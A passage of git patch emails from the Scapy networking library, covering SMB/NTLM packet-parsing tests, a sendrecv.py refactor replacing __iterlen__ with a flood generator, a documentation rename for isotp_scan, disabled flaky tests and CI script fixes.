Ether(b'\x00PV\xc0\x00\x01\x00\x0c)a\xf5_\x08\x00E\x00\x00\xb6Qf\x00\x00\x80\x06\xd9\x03\xc0\xa8\xc7\x85\xc0\xa8\xc7\x01\xc2\x08\x00\x8b\xd7\xcb\xee\xdb\x10]}FP\x18\x00\xffw\x7f\x00\x00\x00\x00\x00\x8a\xffSMBs\x00\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe\x00\x00\x10\x00\x0c\xff\x00\x00\x00\x04\x11\n\x00\x00\x00\x00\x00\x00\x00J\x00\x00\x00\x00\x00\xd4\x00\x00\xa0O\x00`H\x06\x06+\x06\x01\x05\x05\x02\xa0>0<\xa0\x0e0\x0c\x06\n+\x06\x01\x04\x01\x827\x02\x02\n\xa2*\x04(NTLMSSP\x00\x01\x00\x00\x00\x97\x82\x08\xe2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00Z)\x00\x00\x00\x0f\x00\x00\x00\x00\x00') +assert SMBSession_Setup_AndX_Request_Extended_Security in smb_sax_req_1 +assert smb_sax_req_1.Flags2.EXTENDED_SECURITY +assert smb_sax_req_1.Flags2.UNICODE +assert isinstance(smb_sax_req_1.SecurityBlob.innerContextToken.token.mechToken.value, NTLM_NEGOTIATE) +ntlm_nego = smb_sax_req_1.SecurityBlob.innerContextToken.token.mechToken.value +assert ntlm_nego.ProductBuild == 10586 +assert ntlm_nego.Payload == [('DomainName', ''), ('WorkstationName', '')] + += SMB Setup AndX Response (ES) + +from scapy.layers.ntlm import * + +smb_sax_resp_1 = Ether(b"\x00\x0c)a\xf5_\x00PV\xc0\x00\x01\x08\x00E\x00\x01,\x03I@\x00\x80\x06\xe6\xaa\xc0\xa8\xc7\x01\xc0\xa8\xc7\x85\x00\x8b\xc2\x08\x10]}F\xd7\xcb\xefiP\x18\x00\xff\xeb)\x00\x00\x00\x00\x01\x00\xffSMBs\x16\x00\x00\xc0\x98\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe\x00\x08\x10\x00\x04\xff\x00\x00\x01\x00\x00\x93\x00\xd5\x00\xa1\x81\x900\x81\x8d\xa0\x03\n\x01\x01\xa1\x0c\x06\n+\x06\x01\x04\x01\x827\x02\x02\n\xa2x\x04vNTLMSSP\x00\x02\x00\x00\x00\x06\x00\x06\x008\x00\x00\x00\x15\x82\x8a\xe2\x88\xbc\x9bX4\xbe7\r\x00\x00\x00\x00\x00\x00\x00\x008\x008\x00>\x00\x00\x00\x06\x03\x80%\x00\x00\x00\x0fS\x00C\x00V\x00\x02\x00\x06\x00S\x00C\x00V\x00\x01\x00\x06\x00S\x00C\x00V\x00\x04\x00\x06\x00S\x00C\x00V\x00\x03\x00\x06\x00S\x00C\x00V\x00\x07\x00\x08\x00\xd5\x9d6\x9b\x84'\xd2\x01\x00\x00\x00\x00W\x00i\x00n\x00d\x00o\x00w\x00s\x00 \x008\x00.\x001\x00 \x009\x006\x000\x000\x00\x00\x00W\x00i\x00n\x00d\x00o\x00w\x00s\x00 \x008\x00.\x001\x00 \x006\x00.\x003\x00\x00\x00") +assert SMBSession_Setup_AndX_Response_Extended_Security in smb_sax_resp_1 +assert smb_sax_resp_1.AndXCommand == 255 +assert smb_sax_resp_1.SecurityBlob.token.negResult == 1 +assert isinstance(smb_sax_resp_1.SecurityBlob.token.responseToken.value, NTLM_CHALLENGE) +ntlm_challenge = smb_sax_resp_1.SecurityBlob.token.responseToken.value +assert len(ntlm_challenge.Payload) == 2 +assert ntlm_challenge.Payload[0] == ('TargetName', 'SCV') +assert ntlm_challenge.Payload[1][0] == 'TargetInfo' +assert len(ntlm_challenge.Payload[1][1]) == 6 +assert ntlm_challenge.Payload[1][1][0].sprintf("%AvId%") == 'MsvAvNbDomainName' +assert ntlm_challenge.Payload[1][1][1].sprintf("%AvId%") == 'MsvAvNbComputerName' +assert ntlm_challenge.Payload[1][1][2].sprintf("%AvId%") == 'MsvAvDnsDomainName' +assert ntlm_challenge.Payload[1][1][3].sprintf("%AvId%") == 'MsvAvDnsComputerName' +assert ntlm_challenge.Payload[1][1][4].sprintf("%AvId%") == 'MsvAvTimestamp' +assert ntlm_challenge.Payload[1][1][5].sprintf("%AvId%") == 'MsvAvEOL' +for i in range(4): + assert ntlm_challenge.Payload[1][1][i].Value == "SCV" + += SMB Setup AndX Request - accept incomplete (ES) + +from scapy.layers.ntlm import * + +smb_sax_req_2 = Ether(b'\x00PV\xc0\x00\x01\x00\x0c)a\xf5_\x08\x00E\x00\x01\x18Qg\x00\x00\x80\x06\xd8\xa0\xc0\xa8\xc7\x85\xc0\xa8\xc7\x01\xc2\x08\x00\x8b\xd7\xcb\xefi\x10]~JP\x18\x00\xfey\xc4\x00\x00\x00\x00\x00\xec\xffSMBs\x00\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe\x00\x08 \x00\x0c\xff\x00\x00\x00\x04\x11\n\x00\x00\x00\x00\x00\x00\x00\xac\x00\x00\x00\x00\x00\xd4\x00\x00\xa0\xb1\x00\xa1\x81\xa90\x81\xa6\xa0\x03\n\x01\x01\xa2\x81\x8a\x04\x81\x87NTLMSSP\x00\x03\x00\x00\x00\x01\x00\x01\x00v\x00\x00\x00\x00\x00\x00\x00w\x00\x00\x00\x00\x00\x00\x00X\x00\x00\x00\x00\x00\x00\x00X\x00\x00\x00\x1e\x00\x1e\x00X\x00\x00\x00\x10\x00\x10\x00w\x00\x00\x00\x15\x8a\x88\xe2\n\x00Z)\x00\x00\x00\x0fN,A\xe36\xa1M\x9dq\xc5\x12\x92\xa4\xc8\xc9\xf2D\x00E\x00S\x00K\x00T\x00O\x00P\x00-\x00V\x001\x00F\x00A\x000\x00U\x00Q\x00\x00/\t\x13+\x81\xa6\x15\x14\xb9\x11\x8b\xe0\x00\x88\xd7\x1f\xa3\x12\x04\x10\x01\x00\x00\x00\xb5\xef\x9d\xa6\x9dm\x12h\x00\x00\x00\x00\x00\x00\x00\x00\x00') +assert SMBSession_Setup_AndX_Request_Extended_Security in smb_sax_req_2 +assert smb_sax_req_2.Flags2.EXTENDED_SECURITY +assert smb_sax_req_2.Flags2.UNICODE +assert smb_sax_req_2.AndXCommand == 255 +assert smb_sax_req_2.SecurityBlob.token.negResult == 1 +ntlm_authenticate = NTLM_Header(smb_sax_req_2.SecurityBlob.token.responseToken.value.val) +assert isinstance(ntlm_authenticate, NTLM_AUTHENTICATE) +assert len(ntlm_authenticate.Payload) == 6 +assert ntlm_authenticate.Payload[0] == ('DomainName', '') +assert ntlm_authenticate.Payload[1] == ('UserName', '') +assert ntlm_authenticate.Payload[2] == ('Workstation', 'DESKTOP-V1FA0UQ') +assert ntlm_authenticate.Payload[3][0] == 'LmChallengeResponse' +assert isinstance(ntlm_authenticate.Payload[3][1], LMv2_RESPONSE) +assert ntlm_authenticate.Payload[4][0] == 'NtChallengeResponse' +assert ntlm_authenticate.Payload[4][1].AvPairs[0].sprintf("%AvId%") == 'MsvAvEOL' + += SMB Setup AndX Response - accept complete (ES) + +smb_sax_resp_2 = Ether(b'\x00\x0c)a\xf5_\x00PV\xc0\x00\x01\x08\x00E\x00\x00\xb6\x03J@\x00\x80\x06\xe7\x1f\xc0\xa8\xc7\x01\xc0\xa8\xc7\x85\x00\x8b\xc2\x08\x10]~J\xd7\xcb\xf0YP\x18\x00\xfeB\x10\x00\x00\x00\x00\x00\x8a\xffSMBs\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe\x00\x08 \x00\x04\xff\x00\x8a\x00\x00\x00\x1d\x00_\x00\xa1\x1b0\x19\xa0\x03\n\x01\x00\xa3\x12\x04\x10\x01\x00\x00\x00\xee\t\x91S\xab\x7f]\xe6\x00\x00\x00\x00W\x00i\x00n\x00d\x00o\x00w\x00s\x00 \x008\x00.\x001\x00 \x009\x006\x000\x000\x00\x00\x00W\x00i\x00n\x00d\x00o\x00w\x00s\x00 \x008\x00.\x001\x00 \x006\x00.\x003\x00\x00\x00') +assert SMBSession_Setup_AndX_Response_Extended_Security in smb_sax_resp_2 +assert smb_sax_resp_2.SecurityBlob.token.negResult == 0 +assert smb_sax_resp_2.SecurityBlob.token.mechListMIC.value.val == b'\x04\x10\x01\x00\x00\x00\xee\t\x91S\xab\x7f]\xe6\x00\x00\x00\x00' +assert smb_sax_resp_2.NativeOS == 'Windows 8.1 9600' +assert smb_sax_resp_2.NativeLanMan == 'Windows 8.1 6.3' diff --git a/tox.ini b/tox.ini index bbde3fa053b..1240cd7a6bb 100644 --- a/tox.ini +++ b/tox.ini @@ -139,6 +139,7 @@ commands = flake8 scapy/ ignore = E731, W504 per-file-ignores = scapy/all.py:F403,F401 + scapy/asn1/mib.py:E501 scapy/contrib/automotive/obd/obd.py:F405,F403 scapy/contrib/automotive/obd/pid/pids.py:F405,F403 scapy/contrib/automotive/obd/scanner.py:F405,F403,E501 From 7d4ca8236fc08c8cfdfc84f4b8f3c8ee1c1b94b4 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 11 Oct 2021 12:30:20 +0200 Subject: [PATCH 0680/1632] Remove dumb & broken tests --- test/contrib/ppi_geotag.uts | 32 -------------------------------- 1 file changed, 32 deletions(-) diff --git a/test/contrib/ppi_geotag.uts b/test/contrib/ppi_geotag.uts index e25e757b8be..b406823b95e 100644 --- a/test/contrib/ppi_geotag.uts +++ b/test/contrib/ppi_geotag.uts @@ -28,35 +28,3 @@ assert raw(PPI_Hdr()/PPI_Geotag_Antenna()) == b'5u\x08\x00\x02\x00\x08\x00\x00\x assert GPSTime_Field("GPSTime", None).delta == 0.0 -= Test UTCTimeField with time values - -# Always use ``time.gmtime`` and ``calendar.timegm``, not ``time.localtime`` -# and ``time.mktime``. - -local_time = time.gmtime() -utc_time = UTCTimeField("Test", None, epoch=local_time) -assert time.gmtime(utc_time.epoch) == local_time -assert calendar.timegm(time.gmtime(utc_time.delta)) == calendar.timegm(local_time) -strft_time = time.strftime("%a, %d %b %Y %H:%M:%S %z", local_time) - -# Backup: also test summer time bug -expected = "{} ({:d})".format(strft_time, utc_time.delta) -result = utc_time.i2repr(None, None) -result -expected -assert result == expected - -= Test LETimeField with time values - -local_time = time.gmtime() -lme_time = LETimeField("Test", None, epoch=local_time) -assert time.gmtime(lme_time.epoch) == local_time -assert calendar.timegm(time.gmtime(lme_time.delta)) == calendar.timegm(local_time) -strft_time = time.strftime("%a, %d %b %Y %H:%M:%S %z", local_time) - -# Backup: also test summer time bug -expected = "{} ({:d})".format(strft_time, lme_time.delta) -result = lme_time.i2repr(None, None) -result -expected -assert result == expected From d55cca3b1f1922e26dc7290293e86d1eb7ea91ec Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 21 Oct 2021 11:29:28 +0200 Subject: [PATCH 0681/1632] Remove __iterlen__ and improve how sent_time is shared (#3384) --- scapy/packet.py | 62 ++------------------- scapy/sendrecv.py | 129 +++++++++++++++++++++++++++----------------- test/regression.uts | 5 +- 3 files changed, 86 insertions(+), 110 deletions(-) diff --git a/scapy/packet.py b/scapy/packet.py index ba0f81c05e7..6f740df697f 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -456,8 +456,6 @@ def setfieldval(self, attr, val): def __setattr__(self, attr, val): # type: (str, Any) -> None if attr in self.__all_slots__: - if attr == "sent_time": - self.update_sent_time(val) return object.__setattr__(self, attr, val) try: return self.setfieldval(attr, val) @@ -1051,13 +1049,8 @@ def hide_defaults(self): del self.fields[k] self.payload.hide_defaults() - def update_sent_time(self, time): - # type: (Optional[float]) -> None - """Use by clone_with to share the sent_time value""" - pass - - def clone_with(self, payload=None, share_time=False, **kargs): - # type: (Optional[Any], bool, **Any) -> Any + def clone_with(self, payload=None, **kargs): + # type: (Optional[Any], **Any) -> Any pkt = self.__class__() pkt.explicit = 1 pkt.fields = kargs @@ -1073,18 +1066,11 @@ def clone_with(self, payload=None, share_time=False, **kargs): pkt.wirelen = self.wirelen if payload is not None: pkt.add_payload(payload) - if share_time: - # This binds the subpacket .sent_time to this layer - def _up_time(x, parent=self): - # type: (float, Packet) -> None - parent.sent_time = x - pkt.update_sent_time = _up_time # type: ignore return pkt def __iter__(self): # type: () -> Iterator[Packet] """Iterates through all sub-packets generated by this Packet.""" - # We use __iterlen__ as low as possible, to lower processing time def loop(todo, done, self=self): # type: (List[str], Dict[str, Any], Any) -> Iterator[Packet] if todo: @@ -1104,19 +1090,13 @@ def loop(todo, done, self=self): payloads = SetGen([None]) # type: SetGen[Packet] else: payloads = self.payload - share_time = False - if self.fields == done and payloads.__iterlen__() == 1: - # In this case, the packets are identical. Let's bind - # their sent_time attribute for sending purpose - share_time = True for payl in payloads: # Let's make sure subpackets are consistent done2 = done.copy() for k in done2: if isinstance(done2[k], VolatileValue): done2[k] = done2[k]._fix() - pkt = self.clone_with(payload=payl, share_time=share_time, - **done2) + pkt = self.clone_with(payload=payl, **done2) yield pkt if self.explicit or self.raw_packet_cache is not None: @@ -1129,42 +1109,6 @@ def loop(todo, done, self=self): done = {} return loop(todo, done) - def __iterlen__(self): - # type: () -> int - """Predict the total length of the iterator""" - fields = [key for (key, val) in itertools.chain(six.iteritems(self.default_fields), # noqa: E501 - six.iteritems(self.overloaded_fields)) - if isinstance(val, VolatileValue)] + list(self.fields) - length = 1 - - def is_valid_gen_tuple(x): - # type: (Any) -> bool - if not isinstance(x, tuple): - return False - return len(x) == 2 and all(isinstance(z, int) for z in x) - - for field in fields: - fld, val = self.getfield_and_val(field) - if hasattr(val, "__iterlen__"): - length *= val.__iterlen__() - elif is_valid_gen_tuple(val): - length *= (val[1] - val[0] + 1) - elif isinstance(val, list) and not fld.islist: - len2 = 0 - for x in val: - if hasattr(x, "__iterlen__"): - len2 += x.__iterlen__() - elif is_valid_gen_tuple(x): - len2 += (x[1] - x[0] + 1) - elif isinstance(x, list): - len2 += len(x) - else: - len2 += 1 - length *= len2 or 1 - if not isinstance(self.payload, NoPayload): - return length * self.payload.__iterlen__() - return length - def iterpayloads(self): # type: () -> Iterator[Packet] """Used to iter through the payloads of a Packet. diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 6890e412be6..c3e53b21770 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -14,7 +14,6 @@ import re import subprocess import time -import types from scapy.compat import plain_str from scapy.data import ETH_P_ALL @@ -27,7 +26,7 @@ ) from scapy.packet import Packet from scapy.utils import get_temp_file, tcpdump, wrpcap, \ - ContextManagerSubprocess, PcapReader + ContextManagerSubprocess, PcapReader, EDecimal from scapy.plist import ( PacketList, QueryAnswer, @@ -120,7 +119,7 @@ def __init__(self, multi=False, # type: bool rcv_pks=None, # type: Optional[SuperSocket] prebuild=False, # type: bool - _flood=None, # type: Optional[Tuple[int, Callable[[], None]]] # noqa: E501 + _flood=None, # type: Optional[_FloodGenerator] threaded=False, # type: bool session=None # type: Optional[_GlobSessionType] ): @@ -142,19 +141,15 @@ def __init__(self, self.multi = multi self.timeout = timeout self.session = session + self._send_done = False + self.notans = 0 + self.noans = 0 + self._flood = _flood # Instantiate packet holders - if _flood: - self.tobesent = pkt # type: Union[_PacketIterable, SetGen[Packet]] - self.notans = _flood[0] + if prebuild and not self._flood: + self.tobesent = list(pkt) # type: _PacketIterable else: - if isinstance(pkt, types.GeneratorType) or prebuild: - self.tobesent = list(pkt) - self.notans = len(self.tobesent) - else: - self.tobesent = ( - SetGen(pkt) if not isinstance(pkt, Gen) else pkt - ) - self.notans = self.tobesent.__iterlen__() + self.tobesent = pkt if retry < 0: autostop = retry = -retry @@ -167,7 +162,7 @@ def __init__(self, while retry >= 0: self.hsent = {} # type: Dict[bytes, List[Packet]] - if threaded or _flood: + if threaded or self._flood: # Send packets in thread. # https://github.com/secdev/scapy/issues/1791 snd_thread = Thread( @@ -179,9 +174,9 @@ def __init__(self, self._sndrcv_rcv(snd_thread.start) # Ended. Let's close gracefully - if _flood: + if self._flood: # Flood: stop send thread - _flood[1]() + self._flood.stop() snd_thread.join() else: self._sndrcv_rcv(self._sndrcv_snd) @@ -217,7 +212,8 @@ def __init__(self, print( "\nReceived %i packets, got %i answers, " "remaining %i packets" % ( - self.nbrecv + len(self.ans), len(self.ans), self.notans + self.nbrecv + len(self.ans), len(self.ans), + max(0, self.notans - self.noans) ) ) @@ -231,10 +227,11 @@ def results(self): def _sndrcv_snd(self): # type: () -> None """Function used in the sending thread of sndrcv()""" + i = 0 + p = None try: if self.verbose: print("Begin emission:") - i = 0 for p in self.tobesent: # Populate the dictionary of _sndrcv_rcv # _sndrcv_rcv won't miss the answer of a packet that @@ -250,6 +247,17 @@ def _sndrcv_snd(self): pass except Exception: log_runtime.exception("--- Error sending packets") + finally: + try: + cast(Packet, self.tobesent).sent_time = \ + cast(Packet, p).sent_time + except AttributeError: + pass + if self._flood: + self.notans = self._flood.iterlen + elif not self._send_done: + self.notans = i + self._send_done = True def _process_packet(self, r): # type: (Packet) -> None @@ -268,13 +276,13 @@ def _process_packet(self, r): ok = True if not self.multi: del hlst[i] - self.notans -= 1 + self.noans += 1 else: if not hasattr(sentpkt, '_answered'): - self.notans -= 1 + self.noans += 1 sentpkt._answered = 1 break - if self.notans <= 0 and not self.multi: + if self._send_done and self.noans >= self.notans and not self.multi: if self.sniffer: self.sniffer.stop(join=False) if not ok: @@ -342,8 +350,8 @@ def __gen_send(s, # type: SuperSocket loop = -count elif not loop: loop = -1 - if return_packets: - sent_packets = PacketList() + sent_packets = PacketList() if return_packets else None + p = None try: while loop: dt0 = None @@ -357,7 +365,7 @@ def __gen_send(s, # type: SuperSocket else: dt0 = ct - float(p.time) s.send(p) - if return_packets: + if sent_packets is not None: sent_packets.append(p) n += 1 if verbose: @@ -367,11 +375,14 @@ def __gen_send(s, # type: SuperSocket loop += 1 except KeyboardInterrupt: pass + finally: + try: + cast(Packet, x).sent_time = cast(Packet, p).sent_time + except AttributeError: + pass if verbose: print("\nSent %i packets." % n) - if return_packets: - return sent_packets - return None + return sent_packets def _send(x, # type: _PacketIterable @@ -792,6 +803,45 @@ def srploop(pkts, # type: _PacketIterable # SEND/RECV FLOOD METHODS +class _FloodGenerator(object): + def __init__(self, tobesent, maxretries): + # type: (_PacketIterable, Optional[int]) -> None + self.tobesent = tobesent + self.maxretries = maxretries + self.stopevent = Event() + self.iterlen = 0 + + def __iter__(self): + # type: () -> Iterator[Packet] + i = 0 + while True: + i += 1 + j = 0 + if self.maxretries and i >= self.maxretries: + return + for p in self.tobesent: + if self.stopevent.is_set(): + return + j += 1 + yield p + if self.iterlen == 0: + self.iterlen = j + + @property + def sent_time(self): + # type: () -> Union[EDecimal, float, None] + return cast(Packet, self.tobesent).sent_time + + @sent_time.setter + def sent_time(self, val): + # type: (Union[EDecimal, float, None]) -> None + cast(Packet, self.tobesent).sent_time = val + + def stop(self): + # type: () -> None + self.stopevent.set() + + def sndrcvflood(pks, # type: SuperSocket pkt, # type: _PacketIterable inter=0, # type: int @@ -802,30 +852,13 @@ def sndrcvflood(pks, # type: SuperSocket ): # type: (...) -> Tuple[SndRcvList, PacketList] """sndrcv equivalent for flooding.""" - stopevent = Event() - - def send_in_loop(tobesent, stopevent): - # type: (_PacketIterable, Event) -> Iterator[Packet] - """Infinite generator that produces the same - packet until stopevent is triggered.""" - i = 0 - while True: - i += 1 - if maxretries and i >= maxretries: - return - for p in tobesent: - if stopevent.is_set(): - return - yield p - infinite_gen = send_in_loop(pkt, stopevent) - _flood_len = pkt.__iterlen__() if isinstance(pkt, Gen) else len(pkt) - _flood = [_flood_len, stopevent.set] + flood_gen = _FloodGenerator(pkt, maxretries) return sndrcv( - pks, infinite_gen, + pks, flood_gen, inter=inter, verbose=verbose, chainCC=chainCC, timeout=timeout, - _flood=_flood + _flood=flood_gen ) diff --git a/test/regression.uts b/test/regression.uts index a63924dbebf..32b822d7aa0 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1582,13 +1582,12 @@ l = [p for p in a] len(l) == 7 = Implicit logic 3 - -# In case there's a single option: __iter__ should return self +# In case there's a single option: __iter__ should not return self a = Ether()/IP(src="127.0.0.1", dst="127.0.0.1")/ICMP() for i in a: i.sent_time = 1 -assert a.sent_time == 1 +assert a.sent_time is None # In case they are several, self should never be returned a = Ether()/IP(src="127.0.0.1", dst="127.0.0.1")/ICMP(seq=(0, 5)) From 50511944b4da966480bf4e6f100332357e45c10c Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 25 Oct 2021 17:39:40 +0200 Subject: [PATCH 0682/1632] Fix name of isotp_scan function in documentation --- doc/scapy/layers/automotive.rst | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/doc/scapy/layers/automotive.rst b/doc/scapy/layers/automotive.rst index 702ffcba7c5..46b96df937b 100644 --- a/doc/scapy/layers/automotive.rst +++ b/doc/scapy/layers/automotive.rst @@ -43,7 +43,7 @@ function to get all information about one specific protocol. | | | | | | | ISOTPSniffer, ISOTPMessageBuilder, ISOTPSession | | | | | -| | | ISOTPHeader, ISOTPHeaderEA, ISOTPScan | +| | | ISOTPHeader, ISOTPHeaderEA, isotp_scan | | | | | | | | ISOTP, ISOTP_SF, ISOTP_FF, ISOTP_CF, ISOTP_FC | +----------------------+----------------------+--------------------------------------------------------+ @@ -930,10 +930,10 @@ Close sockets:: isoTpSocketVCan1.close() -ISOTPScan and ISOTPScanner --------------------------- +isotp_scan and ISOTPScanner +--------------------------- -ISOTPScan is a utility function to find ISOTP-Endpoints on a CAN-Bus. +isotp_scan is a utility function to find ISOTP-Endpoints on a CAN-Bus. ISOTPScanner is a commandline-utility for the identical function. .. image:: ../graphics/animations/animation-scapy-isotpscan.svg @@ -989,7 +989,7 @@ Interactive shell usage example:: >>> conf.contribs['CANSocket'] = {'use-python-can': False} >>> load_contrib('cansocket') >>> load_contrib('isotp') - >>> socks = ISOTPScan(CANSocket("vcan0"), range(0x700, 0x800), can_interface="vcan0") + >>> socks = isotp_scan(CANSocket("vcan0"), range(0x700, 0x800), can_interface="vcan0") >>> socks [< at 0x7f98e27c8210>, < at 0x7f98f9079cd0>, From 5cc139075793a3f38dd9650cb298c3b198deedfc Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 18 Oct 2021 17:44:22 +0200 Subject: [PATCH 0683/1632] Dumb: disable tests that failed once --- test/contrib/automotive/gm/scanner.uts | 2 +- test/contrib/isotp_soft_socket.uts | 3 ++- 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/test/contrib/automotive/gm/scanner.uts b/test/contrib/automotive/gm/scanner.uts index 94ebe8137af..595869d6475 100644 --- a/test/contrib/automotive/gm/scanner.uts +++ b/test/contrib/automotive/gm/scanner.uts @@ -131,7 +131,7 @@ assert EcuState(session=3, tp=1, security_level=2) in scanner.final_states assert EcuState(session=2, tp=1, communication_control=1, security_level=2, request_download=1) in scanner.final_states = Simulate ECU and test GMLAN_RDBIEnumerator - +~ disabled resps = [EcuResponse(None, [GMLAN()/GMLAN_RDBIPR(dataIdentifier=1)/Raw(b"asdfbeef1")]), EcuResponse(None, [GMLAN()/GMLAN_RDBIPR(dataIdentifier=2)/Raw(b"beef2")]), diff --git a/test/contrib/isotp_soft_socket.uts b/test/contrib/isotp_soft_socket.uts index b0cbc13c90a..44ec0dc54e7 100644 --- a/test/contrib/isotp_soft_socket.uts +++ b/test/contrib/isotp_soft_socket.uts @@ -1,5 +1,5 @@ % Regression tests for ISOTPSoftSocket -~ automotive_comm +~ automotive_comm disabled + Configuration ~ conf @@ -790,6 +790,7 @@ with TestSocket(CAN) as cs1, ISOTPSoftSocket(cs1, sid=0x641, did=0x241, padding= = Send a two-frame ISOTP message with padding +~ disabled acks = TestSocket(CAN) cans = TestSocket(CAN) From d1d2ff1473287abb615f3a2cf8ad67ce86dc41a3 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Mon, 1 Nov 2021 15:54:45 +0100 Subject: [PATCH 0684/1632] Several CI related fixes (#3399) * Fix UTscapy timeout logs * Add doc * Set fail-fast to false * Linting * Use bash substring * Install libpcap * Run tox in parallel mode --- .appveyor.yml | 3 ++- .config/ci/install.sh | 18 ++++++++++-------- .config/ci/test.sh | 2 +- .github/workflows/unittests.yml | 1 + scapy/autorun.py | 33 +++++++++++++++++++++++++++++++-- scapy/tools/UTscapy.py | 25 +++++++++++-------------- 6 files changed, 56 insertions(+), 26 deletions(-) diff --git a/.appveyor.yml b/.appveyor.yml index 5e1b8bc8ab0..fa2c97e6f71 100644 --- a/.appveyor.yml +++ b/.appveyor.yml @@ -63,9 +63,10 @@ test_script: # Set environment variables - set PYTHONPATH=%APPVEYOR_BUILD_FOLDER% - set PATH=%APPVEYOR_BUILD_FOLDER%;C:\Program Files\Wireshark\;C:\Program Files\Windump\;%PATH% + - set TOX_PARALLEL_NO_SPINNER=1 # Main unit tests - - "%PYTHON%\\python -m tox -- %UT_FLAGS%" + - "%PYTHON%\\python -m tox --parallel -- %UT_FLAGS%" after_test: # Run codecov diff --git a/.config/ci/install.sh b/.config/ci/install.sh index 0553ba3d2b2..8a93f569755 100755 --- a/.config/ci/install.sh +++ b/.config/ci/install.sh @@ -4,15 +4,17 @@ # ./install.sh [install mode] # Detect install mode -if [[ "${1}" == "libpcap" ]]; then +if [[ "${1}" == "libpcap" ]] +then SCAPY_USE_LIBPCAP="yes" - if [[ ! -z "$GITHUB_ACTIONS" ]]; then + if [[ ! -z "$GITHUB_ACTIONS" ]] + then echo "SCAPY_USE_LIBPCAP=yes" >> $GITHUB_ENV fi fi # Install on osx -if [ "$OSTYPE" = "darwin"* ] || [ "$TRAVIS_OS_NAME" = "osx" ] +if [ "${OSTYPE:0:6}" = "darwin" ] || [ "$TRAVIS_OS_NAME" = "osx" ] then if [ ! -z $SCAPY_USE_LIBPCAP ] then @@ -27,12 +29,12 @@ then sudo apt-get update sudo apt-get -qy install tshark net-tools || exit 1 sudo apt-get -qy install can-utils build-essential linux-headers-$(uname -r) linux-modules-extra-$(uname -r) || exit 1 -fi -# Make sure libpcap is installed -if [ ! -z $SCAPY_USE_LIBPCAP ] -then - sudo apt-get -qy install libpcap-dev || exit 1 + # Make sure libpcap is installed + if [ ! -z $SCAPY_USE_LIBPCAP ] + then + sudo apt-get -qy install libpcap-dev || exit 1 + fi fi # On Travis, "osx" dependencies are installed in .travis.yml diff --git a/.config/ci/test.sh b/.config/ci/test.sh index cb368a21d9f..2cf5b25bbbb 100755 --- a/.config/ci/test.sh +++ b/.config/ci/test.sh @@ -89,7 +89,7 @@ echo UT_FLAGS=$UT_FLAGS echo TOXENV=$TOXENV # Launch Scapy unit tests -tox -- ${UT_FLAGS} || exit 1 +TOX_PARALLEL_NO_SPINNER=1 tox --parallel -- ${UT_FLAGS} || exit 1 # Stop if NO_BASH_TESTS is set if [ ! -z "$SIMPLE_TESTS" ] diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index 5628165cf97..48a51c0c62f 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -60,6 +60,7 @@ jobs: runs-on: ${{ matrix.os }} timeout-minutes: 20 strategy: + fail-fast: false matrix: os: [ubuntu-latest] python: [2.7, 3.9] diff --git a/scapy/autorun.py b/scapy/autorun.py index 1387008226b..d5c569df156 100644 --- a/scapy/autorun.py +++ b/scapy/autorun.py @@ -11,12 +11,14 @@ import code import logging import sys +import threading import traceback from scapy.config import conf from scapy.themes import NoTheme, DefaultTheme, HTMLTheme2, LatexTheme2 from scapy.error import log_scapy, Scapy_Exception from scapy.utils import tex_escape +from scapy.modules.six.moves import queue import scapy.modules.six as six @@ -28,6 +30,10 @@ class StopAutorun(Scapy_Exception): code_run = "" +class StopAutorunTimeout(StopAutorun): + pass + + class ScapyAutorunInterpreter(code.InteractiveInterpreter): def __init__(self, *args, **kargs): code.InteractiveInterpreter.__init__(self, *args, **kargs) @@ -87,6 +93,27 @@ def autorun_commands(cmds, my_globals=None, verb=None): return six.moves.builtins.__dict__.get("_", None) +def autorun_commands_timeout(cmds, timeout=None, **kwargs): + """ + Wraps autorun_commands with a timeout that raises StopAutorunTimeout + on expiration. + """ + if timeout is None: + return autorun_commands(cmds, **kwargs) + + q = queue.Queue() + + def _runner(): + q.put(autorun_commands(cmds, **kwargs)) + th = threading.Thread(target=_runner) + th.daemon = True + th.start() + th.join(timeout) + if th.is_alive(): + raise StopAutorunTimeout + return q.get() + + class StringWriter(object): """Util to mock sys.stdout and sys.stderr, and store their output in a 's' var.""" @@ -111,6 +138,7 @@ def autorun_get_interactive_session(cmds, **kargs): commands passed as "cmds" and return all output :param cmds: a list of commands to run + :param timeout: timeout in seconds :returns: (output, returned) contains both sys.stdout and sys.stderr logs """ sstdout, sstderr, sexcepthook = sys.stdout, sys.stderr, sys.excepthook @@ -122,7 +150,7 @@ def autorun_get_interactive_session(cmds, **kargs): try: sys.stdout = sys.stderr = sw sys.excepthook = sys.__excepthook__ - res = autorun_commands(cmds, **kargs) + res = autorun_commands_timeout(cmds, **kargs) except StopAutorun as e: e.code_run = sw.s raise @@ -138,6 +166,7 @@ def autorun_get_interactive_live_session(cmds, **kargs): commands passed as "cmds" and return all output :param cmds: a list of commands to run + :param timeout: timeout in seconds :returns: (output, returned) contains both sys.stdout and sys.stderr logs """ sstdout, sstderr = sys.stdout, sys.stderr @@ -145,7 +174,7 @@ def autorun_get_interactive_live_session(cmds, **kargs): try: try: sys.stdout = sys.stderr = sw - res = autorun_commands(cmds, **kargs) + res = 